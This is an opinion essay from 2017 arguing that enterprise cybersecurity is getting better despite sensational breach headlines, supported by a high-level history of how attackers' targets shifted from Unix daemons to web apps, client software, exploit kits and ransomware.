2017 has been a tough year from a cybersecurity stand point. We’ve seen some of the biggest hacks and data breaches ever, as well as one of the most devastating ransomware/malware outbreaks on record.
Despite all of this – I’m going to make a statement that will shock many in the industry – cybersecurity is getting better, not worse. Why is this so shocking? Primarily because we’ve become too reliant on headlines and vendor marketing to dictate where we are as an industry. We’ve become beholden to our own fear, uncertainty, doubt – which basically says that cybersecurity has never been worse.
It’s true that today’s attackers have access to a much wider array of capabilities than was available in the past. Nation-state techniques and malware have become available to the most resourceful attackers. However, more capabilities does not reflect the general trend of enterprise security as a whole. In fact, the opposite is true.
In contrast to most vendor marketing messages, startup investment decks, and even industry reports, both the security industry (vendors) and security practitioners (defenders on the front lines in the enterprise) have considerably advanced and demonstratively improved repelling, discovering, and remediating threats.
Don’t Believe Your Lying Eyes – Security is Getting Better
In a world of Equifax, Deloitte, WannaCry, Uber and more, how can this possibly be true? Haven’t more records been breached than ever before? What about nation-state attacks?
If you go by headlines, you’re likely to disagree that security is better. Here’s the problem – security isn’t about headlines. Headlines can be more reflective of reporting requirements than they are about the actual state of enterprise security.
Our reality is that sensationalism sells – so media, vendors and analysts try to out-scoop each other, disclosing the next big vulnerability or hack. In some cases, vendors and reporters make news where it doesn’t exist (like when a single infected laptop was reported as the Russians hacking utilities!)
Granted, there are many more attackers out there and there are orders of magnitudes more things to attack (hello IoT), but when you consider how the attackers’ operandi have evolved over the past 25 years, you can see just how far we’ve come:
- In the early to mid-90’s, attackers had a field day on Unix daemons. Everything was fair game, and daemons from DNS and FTP servers to Time Services (anyone remember analyzing port 13 traffic?!) were not only rife with vulnerabilities, but were exposed to the outside world and therefore common exploitation vectors to gain footholds in enterprises.
- As firewalls became more widely deployed, access to many of those services was considerably restricted. However, access to web servers was still wide open in those first-generation firewalls and servers were being deployed rapidly as enterprises established a presence on the web. Therefore, as web servers became more lucrative targets, attackers shifted focus to them.
- As an organization’s audit processes matured and more simple vulnerabilities in the servers were patched, attacker focus shifted again, this time to the third party and custom developed applications running on those web servers. This shift to exploiting web applications spurred the first generation of application firewalls, application audit software, and more broadly promoted secure coding practices.
- As time went on servers and their exposed web applications slowly became more difficult to target on a broad scale and a major shift in focus occurred again – this time targeting clients as opposed to servers. It was during this time that Windows became the focal point of attackers’ efforts and worms and exploits for the client operating systems ran rampant. This was possibly the time when security in the enterprise was at its worst - gradually improving since then. One major contributing factor for this improvement was Microsoft’s introduction of Patch Tuesday, which dramatically limited the effectiveness of discovered vulnerabilities in the most widely deployed OS on the planet, as well as prompting other vendors to introduce automated patching as well.
- At this point, the cat was out of the bag and attackers had a taste of both the plentitude and value of clients as opposed to servers. As the OS itself became more difficult to exploit, the shift to third party applications on the client occurred, repeating a cycle that previously occurred on servers. Eventually the effectiveness of targeting browser plugins – think Java, Flash et al, was broadly understood, ushering in the era of exploit kits – an era we’re only seeing the tail end of, a decade later.
- It’s here the industry stalled for some time, as fighting against the plentitude of vulnerabilities in considerably old browser plugin codebases across the plentitude of third party plugins took quite some time. This faltering in the history of security was one of several contributing factors leading to a new renaissance in malware and backdoor development to unfold.
- This led to a broad shift to non-malware based compromises. In these compromises, attackers use standard system tools and subsystems commonly used by system administrators, making it far more difficult for defenders to distinguish between legitimate and illegitimate usage. We are currently seeing the industry response to this trend, as evidenced by the number of vendor papers and presentations focusing on these types of behaviors and the rise of term “hunting” applied to general processes as opposed to a specific practice.
- Today, improvements in securing infrastructure has driven a wider shift towards “smash and grab” style attacks. In the mid-2000s, we saw these types of attacks mostly in sophisticated, nation-state espionage cases. However, the time between exploitation and discovery has dramatically shrunk for attackers, forcing them to execute attacks almost immediately. We’re currently in the midst of this, and is evidenced by the proliferation of ransomware.
When viewed over time, you can see how our industry has progressed and how we continually get better. In the last decade, there has been a fundamental shift that has driven our growth. It was during this period that we saw the innovation of the Security Operation Center, business processes supporting disciplined and rapid triage, and continual security program improvement driven by auditing and greater understanding of each breach.
So, what’s the point of the history lesson? Understanding these patterns, as opposed to sensationalizing each attack, gives a model for understanding where we are today in cybersecurity, and where we’re heading.
It allows us to do this without the overwhelming sense of panic that often accompanies each subsequent story about a company being breached. Without FUD, we can rationally predict the evolution of the threat landscape and better identify the solutions to protect against the next wave of attacks. So forget what your lying eyes tell you. From both an industry/vendor standpoint down to the security analyst on the front lines – security is getting better.